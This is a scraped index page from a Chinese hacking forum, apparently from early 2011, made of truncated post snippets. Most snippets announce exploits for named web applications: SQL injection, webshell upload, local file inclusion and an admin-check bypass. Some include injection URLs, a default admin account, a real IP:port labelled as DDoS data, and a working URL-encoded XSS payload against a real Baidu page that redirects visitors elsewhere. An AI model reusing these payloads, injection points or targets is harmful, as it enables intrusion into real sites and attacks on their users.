DDOS 专用数据: -------------------------------------------- 憎恨噩梦01-24 115.238.27.110:14500 憎恨噩梦25-35 1
呵呵,腾讯?QQ?网民隐私?公安监控?
呵呵,腾讯?QQ?网民隐私?公安监控?笑而不语……,腾讯自己都承认QQ“不安全”(人为的不安全吧)。 新闻地址:http://news.q
【漏洞】PHPOK3 企业网站建站程序注入
作者:jsbug 网站:http://hi.baidu.com/jsbug/ 朋友总是踩着俺的尸体踏上DOTA的超神之路,看到论坛有人说php
【漏洞】Windows 缩略视图栈缓冲区溢出
Microsoft Windows "CreateSizedDIBSECTION()" 缩略视图栈缓冲区溢出漏洞 受影响系统: Microsoft Windows XP Professional Microsoft Windows Vista SP2 Microsoft Windows Vista SP1 Microsoft Windows Vista Microsoft Windows Server 2008 Microsoft Windows Server 2003 描述: Microsoft Windows的Windows
【套图】美女小纸人 - 日本人的创意真是绝
EasyTalk 微博系统任意修改账户漏洞 - Exp
原作者:心灵 漏洞发现在最新版本:5.01,旧版本没源码,不知是否存在。 还是那句话,看代码…… 看文件:op.php: <?php include('common.inc.php'); //载入全局变量
【对联】快过年了,送对联数副,纯属娱乐!
摘自 T00ls.Net 对联贴,全是网络安全方面的词汇组成,纯属娱乐!如下: 上联:黑完世间站 下联:抓绝天下鸡(刷爆天下库) 横批:黑王之王 上联:黑站挂马抓肉鸡 下
T00ls.Net 域名刚才又被劫持了,这个……
T00ls.Net 域名刚才(2011-1-7 21:10:00 左右)又被劫持了,这个……。真是蛋疼,不管了,爱咋咋地。 “一次装逼引发的被黑事件” 一次装逼成功,引发的连续装
【Exp】“幸福百相园”相册 GetShell 漏洞
漏洞出现在“index.php”,看代码: if($do == 'upload'){ if($_POST['formsub']){ $file = $_FILES['upload']; if(!$file['error']){ if(strpos($file['type'], 'image') === 0){ $hash = $_POST['i'].'.jpg'; //若是IIS,则可此处可自行构
关于昨天T00ls.Net域名被劫持的具体原因
2011-1-8 20:46:51 补充: 这才是真相: 陆羽:是因为**帐号被社工,导致DNS劫持。能搞的路子很多。 这是xx大牛(拿着域名的那个,囧~)被射,不是新网问题,
ExpoCMS展览会行业网站系统后台验证漏洞
/admin/CheckLogin.asp: <% Response.Buffer = True Response.Expires = -1 Response.ExpiresAbsolute = Now() - 1 Response.Expires = 0 Response.CacheControl = "no-cache" Session.CodePage = 65001 Response.Charset = "UTF-8" UserName=Request.Cookies("CNVP_CMS2")("UserName") '在cookie中取username值 If UserName="" Then Response.Redirect("Admin_Login.asp")
T00ls 主域名于 2011-01-05 19:30 被劫持
2011-1-6 15:46:56 补充:关于昨天 T00ls.Net 域名被劫持的具体原因 T00ls.Net 主域名于 2011-01-05 19:30 左右被劫持,其IP指向一美国服务器,并在该服务器上挂了黑页。十分钟前的事,之前一直
ECshop 网店系统支付方式注射漏洞 0day
ECshop 支付方式注射 发布日期:2011.1.5 挖掘作者:fjhgx(俺是农村的) 联系方式:bugtosafe@gmail.com 漏洞文件:lib_
【视频】我让你不给我加星!好素材!哈!
我让你不给我加星!!!!! 人人网牛逼,管理员我让你不给我加星! 人人网弄了个什么实名照片,这货把他自己
野草Weedcms v4.0sp1-5.0贺岁版盲注漏洞
野草 Weedcms v4.0 sp1 至最新 5.0 贺岁版 USER_AGENT 盲注漏洞 程序说明: 野草 Weedcms 基于PHP+MYSQL架构。创新型内容管理模式,建立频道后可定义内容模型,均在后台可以
野草内容管理系统 WeedCMS 5.0 写马漏洞
问题文件在:includes/admin_config.php。 这个程序登录验证是一个对每个方法来验证登录,而不是对整个文件来验证。还是
【新闻】360卫士 VS 金山毒霸 - 坐观好戏
本次360搜集用户信息事件(详情点这里:360秘密收集用户信息日志文件大规模外泄),周教主的对策估计很快出来了... 随着元旦节假日的结束
科威网址导航系统任意下载、删除文件漏洞
垃圾网址导航程序,内核盗用别人的程序还拿去卖钱。鸡肋漏洞,看分析。。 在文件“admin\ad_data.php”中,备份还原数据库功能,
美易CMS上传漏洞(突破刚发布的补丁包)
之前别人说的上传漏洞上网到处有了,结果官方发布了一个补丁包。 官方补丁包说明: 美易企业内容管理系统出现上传漏洞,会导致非管理员上传“asp
【Exp】风华同学录 v2.0 正式版注入漏洞
“0”技术含量,不解释。。。。以及一些风华同学录系统的默认信息。 注入地址: /TeacherList.asp?Action=ViewDetail&ID=3 后台地址: /SysAdm_Login.asp 前台验证将默认为: 账号:fenghua 密码:
【漏洞】精迅 CMS 新闻 内容管理系统漏洞
首先我只是菜鸟,连PHP基本语法也不太懂。下面是我个人分析结果,如有错误,敬请见谅。 主要问题出在找回密码:member.php?acti
【0day】课廊 v1.8.9 后台拿WebShell漏洞
这套系统是收费系统,没有开源,我也是在旁注的时候发现这套系统的,去官方看了下价格还挺高,就顺便分析下,刚出的系统,估计过不了多久就会多起来
PHPOK V3.0 企业站程序本地文件包含漏洞
http://127.0.0.1/index.php?c=js&f=index&act=/../123 看代码: app\www\control\js.php function index_f() { $act = $this->trans_lib->safe("act"); if(file_exists(ROOT_JS.$act.".php")) { include(ROOT_JS.$act.".php"); } else { echo "ERROR"; } exit(); } 刚看了一下后台,没发现可利用地方,虽然已经达成加载全局函数条件。
【VB技巧】VB 中 Byref与Byval传值的区别
VB 变量、参数传递的基本知识: ByRef 与 ByVal 传值的区别 传递方式: ByRef 表示该参数按实际地址传递,源数据可以被调用的函数修改。ByRef 是 Visual Basic 的缺省、默认
360秘密收集用户信息日志文件大规模外泄
360记录的大量用户信息的日志文件大规模外泄,金山网络称360秘密收集用户信息并且遭外泄。 北京时间12月31日消息 当天,2010年12月
64K 数字动画影像之王:德国“Farbrausch”
核总点评: 著名3D即时演算动画,德国“Farbrausch”团队。 其实这个组织我很早就知道了,从我在刚接触电脑的时候就看过他们的动画。但是那
【Exp】WordPress 博客个人信息发布平台
这个漏洞很鸡肋,要有一个发表的权限。昨天看了个中文版的,人家要那个啥才肯放出来……,今天看到了个英文版的!一样的利用方式!到底哪个才是原创
【公告】T00ls 论坛2011元旦发付费邀请码
首先,2011年元旦将给大家发放红包,20金币/人,请大家关注:http://www.t00ls.net/task.php 原本计划元旦开
【公告】T00ls.Net安全技术交流论坛总规则
T00ls是技术性论坛,是国内为数不多的讨论气氛浓厚、研究范围较广的信息安全技术交流平台,无任何盈利、商业与政府性质,本着“低调求发展”的
【漏洞】百度 XSS 跨站 跳转 执行 漏洞一个
百度XSS跨站漏洞一个,漏洞演示: http://stu.baidu.com/i?rt=0&rn=10&ct=1&tn=baiduimage&objurl=%3C%2F%73%63%72%69%70%74%3E%3C%73%63%72%69%70%74%3E%61%6C%65%72%74%28%22%4E%75%63%6C%65%61%72%27%41%74%6B%20%32%30%31%30%2D%31%32%2D%32%39%20%32%30%3A%31%39%3A%31%37%22%29%3B%6C%6F%63%61%74%69%6F%6E%2E%68%72%65%66%3D%22%68%74%74%70%3A%2F%2F%6C%63%78%2E%63%63%2F%22%3C%2F%73%63%72%69%70%74%3E 没啥技术含量的鸡肋漏洞,不解释了。。。 利用代码: http://stu.baidu.com/i?rt=0&rn=10&ct=1&tn=baiduimage&objurl=%3C%2F%73%63%72%69%70%74%3E%3C%73%63%72%69%70%74%3E%61%6C%65%72%74%28%22%4E%75%63%6C%65%61%72%27%41%74%6B%20%32%30%31%30%2D%31%32%2D%32%39%20%32%30%3A%31%39%3A%31%37%22%29%3B%6C%6F%63%61%74%69%6F%6E%2E%68%72%65%66%3D%22%68%74%74%70%3A%2F%2F%6C%63%78%2E%63%63%2F%22%3C%2F%73%63%72%69%70%74%3E 红色部分为URL编码过的JavaScript代码,未编